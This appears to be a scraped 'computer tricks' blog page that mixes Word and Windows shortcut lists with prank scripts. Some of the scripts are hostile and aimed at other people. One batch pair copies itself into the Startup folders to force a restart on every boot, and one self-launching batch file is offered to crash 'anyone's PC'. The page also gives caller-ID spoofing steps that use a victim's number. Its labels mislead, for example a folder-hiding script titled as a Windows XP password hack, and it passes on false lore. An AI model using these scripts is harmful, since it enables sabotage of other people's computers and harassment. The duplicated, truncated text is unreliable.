Shift + F5
GoBack
Returns to the previous insertion point (goes back to up to 3 points, then returns to where you started; this is one of the most useful shortcuts of them all. Also useful when opening a document, if you want to g straight to where you were last editing it)
84
Ctrl + >
GrowFont
Increases the font size of the selection
85
Ctrl + ]
GrowFontOnePoint
Increases the font size of the selection by one point
86
Ctrl + T (or drag the ruler)
HangingIndent
Increases the hanging indent
87
F1
Help
Microsoft Word Help
88
Shift + F1
HelpTool
Lets you get help on a command or screen region or examine text properties
89
Ctrl + Shift + H
Hidden
Makes the selection hidden text (toggle)
90
Click on it
HyperlinkOpen
Connect to a hyperlink's address
91
Ctrl + M (or drag the ruler)
Indent
Moves the left indent to the next tab stop
92
Alt + Ctrl + M (or Alt I, M)
InsertAnnotation
Inserts a comment
93
F3
InsertAutoText
Replaces the name of the AutoText entry with its contents
94
Alt I, B
InsertBreak
Ends a page, column, or section at the insertion point
95
Alt I, C
InsertCaption
Inserts a caption above or below a selected object
96
Ctrl + Shift + Return
InsertColumnBreak
Inserts a column break at the insertion point
97
Alt + Shift + D
InsertDateField
Inserts a date field
98
Alt + Ctrl + D
InsertEndnoteNow
Inserts an endnote reference at the insertion point without displaying the dialog
99
Alt I, F
InsertField
Inserts a field in the active document
100
Ctrl+F9
InsertFieldChars
Inserts an empty field with the enclosing field characters
101
Alt I, L
InsertFile
Inserts the text of another file into the active document
102
Alt I, N
InsertFootnote
Inserts a footnote or endnote reference at the insertion point
103
Alt + Ctrl + F
InsertFootnoteNow
Inserts a footnote reference at the insertion point without displaying the dialog
104
Ctrl + K
InsertHyperlink
Insert Hyperlink
105
Alt I, D
InsertIndexAndTable s
Inserts an index or a table of contents, figures, or authorities into the document
106
Alt + Ctrl + L
InsertListNumField
Inserts a ListNum Field
107
Alt + Shift + F
InsertMergeField
Brings up a dialog to insert a mail merge field at the insertion point. (It does not intercept the button on the Mail merge. toolbar)
108
Ctrl + Return
InsertPageBreak
Inserts a page break at the insertion point
109
Alt + Shift + P
InsertPageField
Inserts a page number field
110
Ctrl + Shift + F3
InsertSpike
Empties the spike AutoText entry and inserts all of its contents into the document
111
Alt + Shift + T
InsertTimeField
Inserts a time field
112
Ctrl + I
Italic
Makes the selection italic (toggle)
113
Ctrl + J
JustifyPara
Aligns the paragraph at both the left and the right indent
114
Ctrl + L
LeftPara
Aligns the paragraph at the left indent
115
Down arrow
LineDown
Moves the insertion point down one line
116
Shift + down arrow
LineDownExtend
Extends the selection down one line
117
Up arrow
LineUp
Moves the insertion point up one line
118
Shift + up arrow
LineUpExtend
Extends the selection up one line
119
Ctrl + F11
LockFields
Locks the selected fields to prevent updating
120
Alt + Shift + K
MailMergeCheck
Checks for errors in a mail merge
121
Alt+Shift+E
MailMergeEditDataSo urce
Lets you edit a mail merge data source
122
Alt + Shift + N
MailMergeToDoc
Collects the results of the mail merge in a document
123
Alt Shift + M
MailMergeToPrinter
Sends the results of the mail merge to the printer
124
Alt + Shift + I
MarkCitation
Marks the text you want to include in the table of authorities
125
Alt + Shift + X
MarkIndexEntry
Marks the text you want to include in the index
126
Alt + Shift + O
MarkTableOfContents Entry
Inserts a TC field (but it is far better to use Heading Styles to generate your Table of Contents instead)
127
Alt or F10
MenuMode
Makes the menu bar active
128
Alt + Shift + F11
MicrosoftScriptEdit or
Starts or switches to Microsoft Development Environment application, allowing you to view the HTML/XML source code that would be behind the document if it were in ..htm format (or that is behind it if it already is in .htm format).
129
Alt + Ctrl + F1
MicrosoftSystemInfo
Execute the Microsoft System Info application
130
F2
MoveText
Moves the selection to a specified location without using the clipboard (press Return to execute the more)
131
Tab
NextCell
Moves to the next table cell
132
F11
NextField
Moves to the next field
133
Alt + F7
NextMisspelling
Find next spelling error
134
Alt + down arrow
NextObject
Moves to the next object on the page
135
Ctrl + F6
NextWindow
Switches to the next document window, equivalent to selecting a document from the Window menu.
136
Ctrl+Shift+N
NormalStyle
Applies the Normal style
137
Ctrl + 0
OpenOrCloseUpPara
Sets or removes extra spacing above the selected paragraph
138
F6
OtherPane
Switches to another window pane in Normal View (for instance, if you have if you have a Footnotes pane open in Normal view and want to switch to the main document and back without closing the pane).
139
Alt + _
OutlineCollapse
Collapses an Outline in Outline View by one level
140
Alt+Shift+rt arrow
OutlineDemote
Demotes the selected paragraphs one heading level
141
Alt + +
OutlineExpand
Expands an Outline in Outline View by one level
142
Alt+Shift+down arrow
OutlineMoveDown
Moves the selection below the next item in the outline
143
Alt+Shift+up arrow
OutlineMoveUp
Moves the selection above the previous item in the outline
144
Alt+Shift+left arrow
OutlinePromote
Promotes the selected paragraphs one heading level
145
Alt + Shift + L
OutlineShowFirstLin e
Toggles between showing the first line of each paragraph only or showing all of the body text in the outline
146
Ins
Overtype
Toggles the typing mode between replacing and inserting
147
PgDn
PageDown
Moves the insertion point and document display to the next screen of text
148
Shift+ PgDn
PageDownExtend
Extends the selection and changes the document display to the next screen of text
149
PgUp
PageUp
Moves the insertion point and document display to the previous screen of text
150
Shift + PgUp
PageUpExtend
Extends the selection and changes the document display to the previous screen of text
151
Ctrl + down arrow
ParaDown
Moves the insertion point to the beginning of the next paragraph
152
Shift + Ctrl + down arrow
ParaDownExtend
Extends the selection to the beginning of the next paragraph
153
Ctrl + up arrow
ParaUp
Moves the insertion point to the beginning of the previous paragraph
154
Shift + Ctrl + up arrow
ParaUpExtend
Extends the selection to the beginning of the previous paragraph
155
Ctrl+Shift+V
PasteFormat
Applies the previously copied formatting to selection
156
Shift + Tab
PrevCell
Moves to the previous table cell
157
Shift + F11
PrevField
Moves to the previous field
158
Alt + up arrow
PrevObject
Moves to the previous object on the page
159
Ctrl + Shift + F6
PrevWindow
Switches back to the previous document window
160
Sfift+F4
RepeatFind
Repeats Go To or Find to find the next occurrence
161
Ctrl+Spacebar
ResetChar
Makes the selection the default character format of the applied style
162
Ctrl+Q
ResetPara
Makes the selection the default paragraph format of the applied style
163
Ctrl +R
RightPara
Aligns the paragraph at the right indent
164
Ctrl + *
ShowAll
Shows/hides all nonprinting characters
165
Alt + Shift + A
ShowAllHeadings
Displays all of the heading levels and the body text in Outline View
166
Ctrl + <
ShrinkFont
Decreases the font size of the selection
167
Ctrl + [
ShrinkFontOnePoint
Decreases the font size of the selection by one point
168
Ctrl + Shift + K
SmallCaps
Makes the selection small capitals (toggle)
169
Ctrl + 1
SpacePara1
Sets the line spacing to single space
170
Ctrl + 5
SpacePara15
Sets the line spacing to one-and-one- half space
171
Ctrl + 2
SpacePara2
Sets the line spacing to double space
172
Ctrl + F3
Spike
Deletes the selection and adds it to the "Spike" AutoText entry (which allows you to move text and graphics from nonadjacent locations)
173
Alt + PgUp
StartOfColumn
Moves to the first cell in the current column
174
Ctrl+Shift+Home
StartOfDocExtend
Extends the selection to the beginning of the first line of the document
175
Ctrl +Home
StartOfDocument
Moves the insertion point to the beginning of the first line of the document
176
Home
StartOfLine
Moves the insertion point to the beginning of the current line
177
Shift+Home
StartOfLineExtend
Extends the selection to the beginning of the current line
178
Alt+Home
StartOfRow
Moves to the first cell in the current row
179
Alt+Ctrl+PgUp
StartOfWindow
Moves the insertion point to the beginning of the first visible line on the screen
180
Shift+ Alt+Ctrl+PgUp
StartOfWindowExtend
Extends the selection to the beginning of the first visible line on the screen
181
Strl + Shift + S
Style
Activates the Style drop-down on the Formatting toolbar
182
Ctrl + =
Subscript
Makes the selection subscript (toggle)
183
Ctrl + +
Superscript
Makes the selection superscript (toggle)
184
Ctrl + Shift + Q
SymbolFont
Applies the Symbol font to the selection
185
Alt A, F
TableAutoFormat
Applies a set of formatting to a table
186
Alt A, H
TableHeadings
Toggles table headings attribute on and off
187
Alt + click
(Alt + drag to select several)
TableSelectColumn
Selects the current column in a table
188
Click in left margin
TableSelectRow
Selects the current row in a table
189
Alt + double-click
TableSelectTable
Selects an entire table
190
Alt + Ctrl + U
TableUpdateAutoForm at
Updates the table formatting to match the applied Table Autoformat settings
191
Shift + F9 (Alt + F9 toggles all field codes on or off)
ToggleFieldDisplay
Shows the field codes or the results for the selection (toggle)
192
Alt T, C
ToolsCustomize
Allows you to customizes the Word user interface (menus, keyboard and toolbars) and store the customizations in a template (defaults to Normal.dot, so be careful!)
193
Alt + F8
ToolsMacro
Runs, creates, deletes, or revises a macro
194
F7
ToolsProofing
Checks the spelling and grammar in the active document
195
Ctr.l + Shift + E
ToolsRevisionMarksT oggle
Toggles track changes for the active document
196
Shift + F7
ToolsThesaurus
Finds a synonym for the selected word
197
Ctrl+U
Underline
Formats the selection with a continuous underline (toggle)
198
Ctrl + Shift + T
(or drag the ruler)
UnHang
Decreases the hanging indent
199
Ctrl + Shift + M
(or drag the ruler)
UnIndent
Moves the left indent to the previous tab stop
200
Ctrl+Shift+F9
UnlinkFields
Permanently replaces the field codes with the results
201
Ctrl + Shift + F11
UnlockFields
Unlocks the selected fields for updating
202
F9
UpdateFields
Updates and displays the results of the selected fields
203
Ctrl + Shiift + F7
UpdateSource
Copies the modified text of a linked file back to its source file
204
Hover over comment
ViewAnnotations
Show or hide the comment pane
205
Dbl-click the endnote reference
ViewEndnoteArea
If in Normal View, opens a pane for viewing and editing the endnote (toggle). If in Page/Print Layout View, switches from the body text to the endnote or vice versa
206
At + F9
ViewFieldCodes
Shows the field codes or results for all fields (toggle)
207
Dbl-click the footnote reference
ViewFootnoteArea
If in Normal View, opens a pane for viewing and editing the footnote (toggle). If in Page/Print Layout View, switches from the body text to the footnote or vice versa.
208
Alt V, F
ViewFootnotes
If in Normal View, opens a pane for viewing and editing footnotes and endnotes (toggle). If in Page/Print Layout View, switches from the body text to the footnotes/endnotes or vice versa.
209
Alt V, H
ViewHeader
Displays header in page layout view
210
Alt V, N
(or Alt + Ctrl + N)
ViewNormal
Changes the editing view to normal view
211
Alt V, O
(or Alt + Ctrl + O)
ViewOutline
Displays a document's outline
212
Alt V, P
(or Alt + Ctrl + P)
ViewPage
Displays the page more-or-less as it will be printed, and allows editing (In Word 2000 the menu item is called Print Layout, but fortunately the command hasn't changed.
213
Alt + F11
ViewVBCode
Shows the VB editing environment (Tools + Macro + Visual Basic Editor)
214
Alt + left arrow
WebGoBack
Backward hyperlink (useful if you clicked on a page number hyperlink in the table of contents and then want to return to the TOC)
215
Alt + rt arrow
WebGoForward
Forward hyperlink
216
Alt W, A
WindowArrangeAll
Arranges windows as non-overlapping tiles
217
Ctrl + left arrow
WordLeft
Moves the insertion point to the left one word
218
Shift + Ctrl + left arrow
WordLeftExtend
Extends the selection to the left one word
219
Ctrl + rt arrow
WordRight
Moves the insertion point to the right one word
220
Shift + Ctrl + rt arrow
WordRightExtend
Extends the selection to the right one word
221
Ctrl + Shift + W
WordUnderline
Underlines the words but not the spaces in the selection (toggle)
Calling friends by their own mobile no
1. Go to http://www.mobivox.com and register there for free account.(I know it is boring but its important.)
2. During the registration process, remember to insert the victim's mobile number when asked to enter the Phone number. The number can be changed later from My Account -> Settings.
3. Complete registration by confirming the email id (any working email id).
4. Enter PIN(Password) and login to your account. Click on "Direct WebCall".
5. In the "Enter a number" box, select any valid mobile number and your country. Now, Click on "Call Now" button to call your friend with his own number.
2. During the registration process, remember to insert the victim's mobile number when asked to enter the Phone number. The number can be changed later from My Account -> Settings.
3. Complete registration by confirming the email id (any working email id).
4. Enter PIN(Password) and login to your account. Click on "Direct WebCall".
5. In the "Enter a number" box, select any valid mobile number and your country. Now, Click on "Call Now" button to call your friend with his own number.
GOOGLE FUN
GOOGLE FUN
Try this …
It's really cool...
1. Go to Google
2. Click images
3. Type 'flowers' or any other word.
4. You will get a page which is having full of images
5. Then delete the URL from the address bar and paste the
below script:
javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i
6. See the magic of programming
Try this …
It's really cool...
1. Go to Google
2. Click images
3. Type 'flowers' or any other word.
4. You will get a page which is having full of images
5. Then delete the URL from the address bar and paste the
below script:
javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images; DIL=DI.length; function A(){for(i=0; i
6. See the magic of programming
HACK THE PASSWORD OF WINDOW-XP
OPEN NOTEPAD FILE & COPY PASTE BELOW CODES UPTO :END.........
& THEN SAVE IS AT .BAT EXTENSION.....
& THEN RUN THE FILE.......
U WILL SEE A FOLDER NAMED LOKER PUT UR DATA WHICH U WANT TO HIDE IN IT & RUN .BAT FILE AGAIN & ENTER Y FOR HIDE THE FOLDER LOKER..
& WHEN U WANT IT BACK THEN JUST OPEN THE .BAT FILE & ENTER UR CHOOSEN PASS WORD IT WILL DONE....
ENJOY.....
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
& THEN SAVE IS AT .BAT EXTENSION.....
& THEN RUN THE FILE.......
U WILL SEE A FOLDER NAMED LOKER PUT UR DATA WHICH U WANT TO HIDE IN IT & RUN .BAT FILE AGAIN & ENTER Y FOR HIDE THE FOLDER LOKER..
& WHEN U WANT IT BACK THEN JUST OPEN THE .BAT FILE & ENTER UR CHOOSEN PASS WORD IT WILL DONE....
ENJOY.....
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
A TRICK TO RESTART SOMEONE'S COMPUTER EVERY TIME
THIS IS A SIMPLE TRICK TO RESTART YOUR COMPUTER ON EVERY START
FIRSTLY U SHOULD HAVE A LITTLE KNOWLEDGE OF MS DOS ..
JUST CREATE A NEW FILE NAME VIRUS.BAT
IN THAT FILE TYPE EXACTLY WHAT I HAVE WRITTEN HERE
@echo off
for %%a IN (C:\documents and settings\all users\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\all users\start menu\programs\startup
@echo off
for %%a IN (C:\documents and settings\administrator\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\administrator\start menu\programs\startup
cd c:\documents and settings\all users\start menu\programs\startup
@echo off
attrib desktop.ini +h +s
cd\
@echo off
exit
AND CLOSE THAT FILE AFTER SAVING
NOW OPEN THAT FILE ..
NOTHING WILL HAPPEN UNTIL U WILL RESTART
HERE IS A SIMPLE TRICK HOW TO MAKE A BATCH PROGRAM WITHOUT USING DOS
GOTO MY COMPUTER -> TOOLS ->FOLDER OPTIONS -> VIEW->HIDE EXTENSIONS FOR KNOWN FILE TYPES CLICK THAT BOX ...
AND NOW CREATE A NEW FILE WHERE U WANT AND NAME IT AS VIRUS.BAT
AND U HAVE MAKE A BAT FILE WITHOUT USING DOS
AND JUST COPY PASTE THE CODE WHICH I GIVEN BY EDITTING THAT FILE AND JUST SAVE IT
.......
%%DON'T MESS% 6:35 pm(0 minutes ago) THE MOST IMPORTANT PART OF IT IS THAT AFTER U HAVE SUCCESSFULLY MADE A BATCH FILE AND COPIED THAT CODE ..
MAKE ANOTHER BATCH PROGRAM IN WHICH THIS CODES ARE WRITTEN
@echo off
shutdown -r -t 00
exit
GIVE IT NAME AS PINFI32.BAT
AND U R ALMOST DONE
JUST COPY THIS 2 FILES WHEREE EVER U WANT AND OPEN THE VIRUS.BAT FILE AND
THE COMPUTER IS ALWAYS RESTART ON WHICH U HAVE DONE.........
FIRSTLY U SHOULD HAVE A LITTLE KNOWLEDGE OF MS DOS ..
JUST CREATE A NEW FILE NAME VIRUS.BAT
IN THAT FILE TYPE EXACTLY WHAT I HAVE WRITTEN HERE
@echo off
for %%a IN (C:\documents and settings\all users\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\all users\start menu\programs\startup
@echo off
for %%a IN (C:\documents and settings\administrator\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\administrator\start menu\programs\startup
cd c:\documents and settings\all users\start menu\programs\startup
@echo off
attrib desktop.ini +h +s
cd\
@echo off
exit
AND CLOSE THAT FILE AFTER SAVING
NOW OPEN THAT FILE ..
NOTHING WILL HAPPEN UNTIL U WILL RESTART
HERE IS A SIMPLE TRICK HOW TO MAKE A BATCH PROGRAM WITHOUT USING DOS
GOTO MY COMPUTER -> TOOLS ->FOLDER OPTIONS -> VIEW->HIDE EXTENSIONS FOR KNOWN FILE TYPES CLICK THAT BOX ...
AND NOW CREATE A NEW FILE WHERE U WANT AND NAME IT AS VIRUS.BAT
AND U HAVE MAKE A BAT FILE WITHOUT USING DOS
AND JUST COPY PASTE THE CODE WHICH I GIVEN BY EDITTING THAT FILE AND JUST SAVE IT
.......
%%DON'T MESS% 6:35 pm(0 minutes ago) THE MOST IMPORTANT PART OF IT IS THAT AFTER U HAVE SUCCESSFULLY MADE A BATCH FILE AND COPIED THAT CODE ..
MAKE ANOTHER BATCH PROGRAM IN WHICH THIS CODES ARE WRITTEN
@echo off
shutdown -r -t 00
exit
GIVE IT NAME AS PINFI32.BAT
AND U R ALMOST DONE
JUST COPY THIS 2 FILES WHEREE EVER U WANT AND OPEN THE VIRUS.BAT FILE AND
THE COMPUTER IS ALWAYS RESTART ON WHICH U HAVE DONE.........
Windows Magic
MAGIC #1
An Indian discovered that nobody can create a FOLDER anywhere on the
computer which can be named as "CON". This is something pretty
cool...and unbelievable... At Microsoft the whole Team, couldn't answer
why this happened!
TRY IT NOW ,IT WILL NOT CREATE " CON " FOLDER
MAGIC #2
For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
is it just a really weird bug? :-??
MAGIC #3
Microsoft crazy facts
This is something pretty cool and neat...and unbelievable... At
Microsoft the whole Team, including Bill Gates, couldn't answer why this
happened!
It was discovered by a Brazilian. Try it out yourself...
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER
then see the magic...............................
An Indian discovered that nobody can create a FOLDER anywhere on the
computer which can be named as "CON". This is something pretty
cool...and unbelievable... At Microsoft the whole Team, couldn't answer
why this happened!
TRY IT NOW ,IT WILL NOT CREATE " CON " FOLDER
MAGIC #2
For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.
is it just a really weird bug? :-??
MAGIC #3
Microsoft crazy facts
This is something pretty cool and neat...and unbelievable... At
Microsoft the whole Team, including Bill Gates, couldn't answer why this
happened!
It was discovered by a Brazilian. Try it out yourself...
Open Microsoft Word and type
=rand (200, 99)
And then press ENTER
then see the magic...............................
Computer Tricks BEST: AutoCDRom open/close
This one is my BEST BEST and BEST find so far.
Its just a simple java script but its starts a loop thats keeping opening and closing your CD Drive.
Heres how it goes
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Save as .vbs and run it. Harmless but loads of fun. Just think what all you can do by adding it to startup
Its just a simple java script but its starts a loop thats keeping opening and closing your CD Drive.
Heres how it goes
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If
Save as .vbs and run it. Harmless but loads of fun. Just think what all you can do by adding it to startup
FOR CRASH ANEONE'S PC
type below codes in notepad & save file as googledotcom.bat
start googledotcom.bat
close
start googledotcom.bat
close
Invisible Scraps
Hey!.....It is very easy to send invisible scraps now!
Just follow the steps as follows!
* Got to someone's scrap book.
* Write there [ i ] without spaces in between.
* Click on Submit.
WOW!
You have just sent an invisible scrap!
Just follow the steps as follows!
* Got to someone's scrap book.
* Write there [ i ] without spaces in between.
* Click on Submit.
WOW!
You have just sent an invisible scrap!
DISKO LIGHTING OF KEYBOARD
Open notepad & type this
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
save as disco.vbs
then just see the lights of the keyboard....(caps lock,scroll lock & num lock wali lights)
For stop the disko::
open task manager and end process wscript.exe
& its done....
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
save as disco.vbs
then just see the lights of the keyboard....(caps lock,scroll lock & num lock wali lights)
For stop the disko::
open task manager and end process wscript.exe
& its done....
HIDE FILES IN A JPG SET UP:
1. Must have a .zip or .rar compressor.
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd "desktop" with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Change Your Ip In Less Then 1 Minute
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Warning:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
Warning:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
Microsoft natural keyboard shortcuts
* Windows Logo (Display or hide the Start menu)
* Windows Logo+BREAK (Display the System Properties dialog box)
* Windows Logo+D (Display the desktop)
* Windows Logo+M (Minimize all of the windows)
* Windows Logo+SHIFT+M (Restore the minimized windows)
* Windows Logo+E (Open My Computer)
* Windows Logo+F (Search for a file or a folder)
* CTRL+Windows Logo+F (Search for computers)
* Windows Logo+F1 (Display Windows Help)
* Windows Logo+ L (Lock the keyboard)
* Windows Logo+R (Open the Run dialog box)
* Windows Logo+U (Open Utility Manager)
* Windows Logo+BREAK (Display the System Properties dialog box)
* Windows Logo+D (Display the desktop)
* Windows Logo+M (Minimize all of the windows)
* Windows Logo+SHIFT+M (Restore the minimized windows)
* Windows Logo+E (Open My Computer)
* Windows Logo+F (Search for a file or a folder)
* CTRL+Windows Logo+F (Search for computers)
* Windows Logo+F1 (Display Windows Help)
* Windows Logo+ L (Lock the keyboard)
* Windows Logo+R (Open the Run dialog box)
* Windows Logo+U (Open Utility Manager)
Accessibility keyboard shortcuts
* Right SHIFT for eight seconds (Switch FilterKeys either on or off)
* Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
* Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
* SHIFT five times (Switch the StickyKeys either on or off)
* NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
* Windows Logo +U (Open Utility Manager)
* Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
* Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
* SHIFT five times (Switch the StickyKeys either on or off)
* NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
* Windows Logo +U (Open Utility Manager)
Windows Explorer keyboard shortcuts
* END (Display the bottom of the active window)
* HOME (Display the top of the active window)
* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
* NUM LOCK+Minus sign (-) (Collapse the selected folder)
* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
* HOME (Display the top of the active window)
* NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
* NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
* NUM LOCK+Minus sign (-) (Collapse the selected folder)
* LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
* RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
* RIGHT ARROW (Move to the right or to the beginning of the next line)
* LEFT ARROW (Move to the left or to the end of the previous line)
* UP ARROW (Move up one row)
* DOWN ARROW (Move down one row)
* PAGE UP (Move up one screen at a time)
* PAGE DOWN (Move down one screen at a time)
* HOME (Move to the beginning of the line)
* END (Move to the end of the line)
* CTRL+HOME (Move to the first character)
* CTRL+END (Move to the last character)
* SPACEBAR (Switch between Enlarged and Normal mode when a character is selec
* RIGHT ARROW (Move to the right or to the beginning of the next line)
* LEFT ARROW (Move to the left or to the end of the previous line)
* UP ARROW (Move up one row)
* DOWN ARROW (Move down one row)
* PAGE UP (Move up one screen at a time)
* PAGE DOWN (Move down one screen at a time)
* HOME (Move to the beginning of the line)
* END (Move to the end of the line)
* CTRL+HOME (Move to the first character)
* CTRL+END (Move to the last character)
* SPACEBAR (Switch between Enlarged and Normal mode when a character is selec
Microsoft Management Console (MMC) main window key
* CTRL+O (Open a saved console)
* CTRL+N (Open a new console)
* CTRL+S (Save the open console)
* CTRL+M (Add or remove a console item)
* CTRL+W (Open a new window)
* F5 key (Update the content of all console windows)
* ALT+SPACEBAR (Display the MMC window menu)
